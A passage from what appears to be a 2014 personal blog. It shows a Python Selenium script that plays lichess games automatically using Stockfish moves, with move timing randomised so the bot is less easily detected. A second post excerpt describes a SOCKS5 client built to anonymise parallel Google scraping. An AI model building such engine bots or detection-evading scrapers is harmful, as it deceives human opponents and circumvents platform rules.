before it can checkmate</li>
<li>Promoting doesn't work yet :/</li>
</ul>
<p>Here is the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">__author__</span> <span class="o">=</span> <span class="s1">'nikolai'</span>
<span class="n">__date__</span> <span class="o">=</span> <span class="s1">'Easter 2014'</span>
<span class="n">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'username'</span> <span class="p">:</span> <span class="s1">'probably_a_spider'</span><span class="p">,</span> <span class="c1"># the login username</span>
<span class="s1">'password'</span> <span class="p">:</span> <span class="s1">'somepwd'</span><span class="p">,</span> <span class="c1"># the login password</span>
<span class="s1">'stockfish_binary'</span> <span class="p">:</span> <span class="s1">'/home/nikolai/PycharmProjects/LichessBot/stockfish-dd-src/src/stockfish'</span><span class="p">,</span> <span class="c1"># the path to your local stockfish binary</span>
<span class="c1">#Set to true if the bot should play forever</span>
<span class="s1">'pwn_forever'</span> <span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># if the bot should play endlessly</span>
<span class="s1">'min_per_side'</span> <span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="c1"># how long each player may play</span>
<span class="s1">'increment'</span> <span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="c1"># the increment per move</span>
<span class="s1">'thinking_time'</span><span class="p">:</span> <span class="mf">.5</span><span class="p">,</span> <span class="c1"># How long stockfish is allowd to search, set to None and stockfish will search 0.75 seconds by default</span>
<span class="s1">'thinking_skew'</span><span class="p">:</span> <span class="mf">.2</span> <span class="c1"># This is the maximal random derivative in decimal of the thinking time (0-1) (to not make the bot to appear to move in the same time intervals all the time)</span>
<span class="p">}</span>
<span class="kn">from</span> <span class="nn">selenium</span> <span class="kn">import</span> <span class="n">webdriver</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver</span> <span class="kn">import</span> <span class="n">ActionChains</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.common.by</span> <span class="kn">import</span> <span class="n">By</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.support.ui</span> <span class="kn">import</span> <span class="n">WebDriverWait</span>
<span class="kn">from</span> <span class="nn">selenium.webdriver.support</span> <span class="kn">import</span> <span class="n">expected_conditions</span> <span class="k">as</span> <span class="n">EC</span>
<span class="kn">from</span> <span class="nn">selenium.common.exceptions</span> <span class="kn">import</span> <span class="n">TimeoutException</span><span class="p">,</span> <span class="n">NoSuchElementException</span><span class="p">,</span> <span class="n">UnexpectedAlertPresentException</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="k">def</span> <span class="nf">get</span><span class="p">(</span><span class="n">proc</span><span class="p">,</span> <span class="n">poll</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="k">if</span> <span class="n">poll</span><span class="p">:</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'isready</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">proc</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">line</span>
<span class="k">if</span> <span class="s1">'readyok'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">if</span> <span class="s1">'bestmove'</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">init_stockfish</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]):</span>
<span class="n">proc</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">Popen</span><span class="p">([</span><span class="n">config</span><span class="p">[</span><span class="s1">'stockfish_binary'</span><span class="p">]],</span> <span class="n">universal_newlines</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span>
<span class="n">stdout</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">PIPE</span><span class="p">)</span>
<span class="n">greeting</span> <span class="o">=</span> <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>
<span class="k">if</span> <span class="ow">not</span> <span class="s1">'Stockfish'</span> <span class="ow">in</span> <span class="n">greeting</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="s1">'Couldnt execute stockfish'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'uci</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>
<span class="c1"># stolen from https://github.com/brandonhsiao/lichess-bot/blob/master/server.py</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Hash value 128</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Threads value 4</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Best Book Move value true</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Aggressiveness value 200</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Cowardice value 0</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'setoption name Contempt Factor value 50</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">proc</span>
<span class="n">proc</span> <span class="o">=</span> <span class="n">init_stockfish</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">make_move</span><span class="p">(</span><span class="n">thinking_time</span><span class="o">=</span><span class="mf">.5</span><span class="p">,</span> <span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
<span class="k">if</span> <span class="n">moves</span><span class="p">:</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'position startpos moves </span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="s1">' '</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">moves</span><span class="p">))</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'go infinite</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">thinking_time</span><span class="p">))</span>
<span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">ve</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">ve</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'stop</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">out</span> <span class="o">=</span> <span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">,</span> <span class="kc">False</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">bestmove</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'bestmove\s(?P[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'move'</span><span class="p">)</span>
<span class="n">ponder</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="sa">r</span><span class="s1">'ponder\s(?P[a-h][1-8][a-h][1-8])'</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span><span class="o">.</span><span class="n">group</span><span class="p">(</span><span class="s1">'ponder'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="n">bestmove</span>
<span class="k">def</span> <span class="nf">newgame_stockfish</span><span class="p">():</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'ucinewgame</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">get</span><span class="p">(</span><span class="n">proc</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">quit_stockfish</span><span class="p">():</span>
<span class="n">proc</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'quit</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">proc</span><span class="o">.</span><span class="n">terminate</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">login</span><span class="p">():</span>
<span class="n">wd</span> <span class="o">=</span> <span class="n">webdriver</span><span class="o">.</span><span class="n">Firefox</span><span class="p">()</span>
<span class="n">wd</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.lichess.org/login'</span><span class="p">)</span>
<span class="n">u</span><span class="p">,</span> <span class="n">p</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s2">"username"</span><span class="p">),</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s2">"password"</span><span class="p">)</span>
<span class="n">u</span><span class="o">.</span><span class="n">send_keys</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span>
<span class="n">p</span><span class="o">.</span><span class="n">send_keys</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span>
<span class="n">p</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">return</span> <span class="n">wd</span>
<span class="k">def</span> <span class="nf">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="n">min_per_side</span><span class="o">=</span><span class="n">config</span><span class="p">[</span><span class="s1">'min_per_side'</span><span class="p">],</span> <span class="n">increment</span><span class="o">=</span><span class="n">config</span><span class="p">[</span><span class="s1">'increment'</span><span class="p">]):</span>
<span class="n">wait</span> <span class="o">=</span> <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">10</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">element</span> <span class="o">=</span> <span class="n">wait</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">element_to_be_clickable</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">CSS_SELECTOR</span><span class="p">,</span><span class="s1">'a[title="Create a game"]'</span><span class="p">)))</span>
<span class="n">element</span><span class="o">.</span><span class="n">click</span><span class="p">()</span>
<span class="k">except</span> <span class="n">UnexpectedAlertPresentException</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
<span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span> <span class="s1">'increment'</span><span class="p">)));</span>
<span class="c1"># Change the inputs with a bit of jQuery (but wait first until the dom bitch is loaded)</span>
<span class="n">wd</span><span class="o">.</span><span class="n">execute_script</span><span class="p">(</span><span class="s2">"$('#time').val('</span><span class="si">{}</span><span class="s2">')"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">min_per_side</span><span class="p">)))</span>
<span class="n">wd</span><span class="o">.</span><span class="n">execute_script</span><span class="p">(</span><span class="s2">"$('#increment').val('</span><span class="si">{}</span><span class="s2">')"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">increment</span><span class="p">)))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_name</span><span class="p">(</span><span class="s1">'color'</span><span class="p">)</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">play</span><span class="p">(</span><span class="n">wd</span><span class="p">):</span>
<span class="k">def</span> <span class="nf">move</span><span class="p">(</span><span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_time'</span><span class="p">]</span> <span class="ow">or</span> <span class="mf">.75</span>
<span class="k">if</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_skew'</span><span class="p">]:</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="n">random</span><span class="o">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">config</span><span class="p">[</span><span class="s1">'thinking_skew'</span><span class="p">]</span><span class="o">*</span><span class="mi">1000</span><span class="p">)</span> <span class="o">/</span> <span class="mi">1000</span><span class="p">)</span>
<span class="n">move</span> <span class="o">=</span> <span class="n">make_move</span><span class="p">(</span><span class="n">thinking_time</span><span class="o">=</span><span class="n">t</span><span class="p">,</span> <span class="n">moves</span><span class="o">=</span><span class="n">moves</span><span class="p">)</span>
<span class="k">if</span> <span class="n">move</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Bot is going to make move </span><span class="si">{}</span><span class="s1"> by calculating </span><span class="si">{}</span><span class="s1"> seconds'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">move</span><span class="p">,</span> <span class="nb">float</span><span class="p">(</span><span class="n">t</span><span class="p">)))</span>
<span class="n">f</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">move</span><span class="p">[:</span><span class="mi">2</span><span class="p">],</span> <span class="n">move</span><span class="p">[</span><span class="mi">2</span><span class="p">:]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">6</span><span class="p">):</span>
<span class="n">action</span> <span class="o">=</span> <span class="n">ActionChains</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">action</span><span class="o">.</span><span class="n">drag_and_drop</span><span class="p">(</span><span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_id</span><span class="p">(</span><span class="n">f</span><span class="p">),</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_id</span><span class="p">(</span><span class="n">t</span><span class="p">))</span>
<span class="n">action</span><span class="o">.</span><span class="n">perform</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">moved</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span>
<span class="n">move1</span><span class="p">,</span> <span class="n">move2</span> <span class="o">=</span> <span class="n">moved</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">),</span> <span class="n">moved</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">t</span> <span class="o">==</span> <span class="n">move1</span> <span class="ow">or</span> <span class="n">f</span> <span class="o">==</span> <span class="n">move1</span><span class="p">:</span>
<span class="k">break</span>
<span class="k">except</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">.2</span><span class="p">)</span>
<span class="k">return</span> <span class="n">move</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">get_last_move</span><span class="p">(</span><span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
<span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">CSS_SELECTOR</span><span class="p">,</span> <span class="s1">'div.moved.lcs'</span><span class="p">)))</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs div.piece'</span><span class="p">)</span><span class="o">.</span><span class="n">find_element_by_xpath</span><span class="p">(</span><span class="s1">'..'</span><span class="p">)</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">!=</span> <span class="n">t</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># If last move was my last move, sleep a bit and try again to get the next move</span>
<span class="k">if</span> <span class="n">moves</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">f</span><span class="o">+</span><span class="n">t</span><span class="p">,</span> <span class="n">moves</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">while</span> <span class="n">f</span><span class="o">+</span><span class="n">t</span> <span class="o">==</span> <span class="n">moves</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
<span class="c1"># busy polling, that's very inefficient</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">.35</span><span class="p">)</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs div.piece'</span><span class="p">)</span><span class="o">.</span><span class="n">find_element_by_xpath</span><span class="p">(</span><span class="s1">'..'</span><span class="p">)</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">!=</span> <span class="n">t</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.table_with_clock.finished'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">except</span> <span class="n">NoSuchElementException</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Opponent moved </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">f</span><span class="o">+</span><span class="n">t</span><span class="p">))</span>
<span class="k">return</span> <span class="n">f</span><span class="o">+</span><span class="n">t</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># wait maximally 100 seconds for an opponent</span>
<span class="n">wait</span> <span class="o">=</span> <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
<span class="c1"># wait until the square a1 is present which means we got a board</span>
<span class="n">element</span> <span class="o">=</span> <span class="n">wait</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span><span class="s1">'a1'</span><span class="p">)))</span>
<span class="k">except</span> <span class="n">TimeoutException</span> <span class="k">as</span> <span class="n">te</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"No board found: </span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">te</span><span class="p">))</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'We got a board, games beginning...'</span><span class="p">)</span>
<span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
<span class="c1"># detect what color we play</span>
<span class="n">players</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'.player > a'</span><span class="p">)</span>
<span class="n">is_black</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">players</span><span class="p">:</span>
<span class="n">is_black</span> <span class="o">=</span> <span class="n">config</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'href'</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'black'</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'class'</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Bot is playing </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">([</span><span class="s1">'white'</span><span class="p">,</span> <span class="s1">'black'</span><span class="p">][</span><span class="n">is_black</span><span class="p">]))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">is_black</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">move</span><span class="p">())</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Moves played: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">moves</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">last</span> <span class="o">=</span> <span class="n">get_last_move</span><span class="p">(</span><span class="n">moves</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'last move found was </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">last</span><span class="p">))</span>
<span class="k">if</span> <span class="n">last</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">last</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'no last move appended. Leaving: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">last</span><span class="p">))</span>
<span class="k">return</span>
<span class="n">m</span> <span class="o">=</span> <span class="n">move</span><span class="p">(</span><span class="n">moves</span><span class="p">)</span>
<span class="k">if</span> <span class="n">m</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.table_with_clock.finished'</span><span class="p">)</span>
<span class="k">return</span>
<span class="k">except</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">def</span> <span class="nf">go_forever</span><span class="p">():</span>
<span class="n">wd</span> <span class="o">=</span> <span class="n">login</span><span class="p">()</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">newgame_stockfish</span><span class="p">()</span>
<span class="n">play</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">wd</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.lichess.org/'</span><span class="p">)</span>
<span class="n">quit_stockfish</span><span class="p">()</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">if</span> <span class="n">config</span><span class="p">[</span><span class="s1">'pwn_forever'</span><span class="p">]:</span>
<span class="n">go_forever</span><span class="p">()</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">wd</span> <span class="o">=</span> <span class="n">login</span><span class="p">()</span>
<span class="n">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">play</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
</code></pre></div>Socks 5 client support for twisted2014-02-05T22:24:00+01:002014-02-05T22:24:00+01:00Nikolai Tschachertag:incolumitas.com,2014-02-05:/2014/02/05/socks-5-client-support-for-twisted/<p>I recently forked
<a href="https://github.com/ln5/twisted-socks" title="twisted socks client">twisted-socks</a>
to add SOCKS 5 support for my
<a href="http://incolumitas.com/googlescraper-py/" title="GoogleScraper">GoogleScraper</a>
in order to scraper Google pages asynchronously. Obviously I needed
SOCKS5 support to anonymize the parallel requests such that I can scrape
more pages simultaneously.</p>
<p>I tested the code for SOCKS4 and SOCKS4a with a local TOR proxy and
<code>twistd -n socks</code> and the SOCKS5 protocol with the <a href="http://www.inet.no/dante/" title="dante">dante socks proxy
server</a> on my VPS. So I guess the
basic functionality should be working by now. GSSAPI (Kerberos)
<a href="https://tools.ietf.org/html/rfc1961">support</a> is planned.</p>
<p>Here is the socksclient code, which is also available on my github
repository:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Copyright (c) 2011-2013, The Tor Project</span>
<span class="c1"># See LICENSE for the license.</span>
<span class="c1"># Updated on 25.01.14-28.01.14 to add SOCKS 5 support.</span>
<span class="c1"># Cleaned some parts of the code and abstracted quite a bit to handle the most important SOCKS5</span>
<span class="c1"># functionality like</span>
<span class="c1"># - username/password authentication</span>
<span class="c1"># - gssapi authentication (planned)</span>
<span class="c1"># - CONNECT command (the normal case, there are others: UDP ASSOCIATE and BIND, but they aren't as important. Maybe I will add them</span>
<span class="c1"># in the future. If anyone wants to implement them, the basic structure is already here and the SOCKSv5ClientProtocol should be</span>
<span class="c1"># rather easy extensible (how the actual connection, listening for incoming connections (BIND) and …</span></code></pre></div><p>I recently forked
<a href="https://github.com/ln5/twisted-socks" title="twisted socks client">twisted-socks</a>
to add SOCKS 5 support for my
<a href="http://incolumitas.com/googlescraper-py/" title="GoogleScraper">GoogleScraper</a>
in order to scraper Google pages asynchronously. Obviously I needed
SOCKS5 support to anonymize the parallel requests such that I can scrape
more pages simultaneously.</p>
<p>I tested the code for SOCKS4 and SOCKS4a with a local TOR proxy and
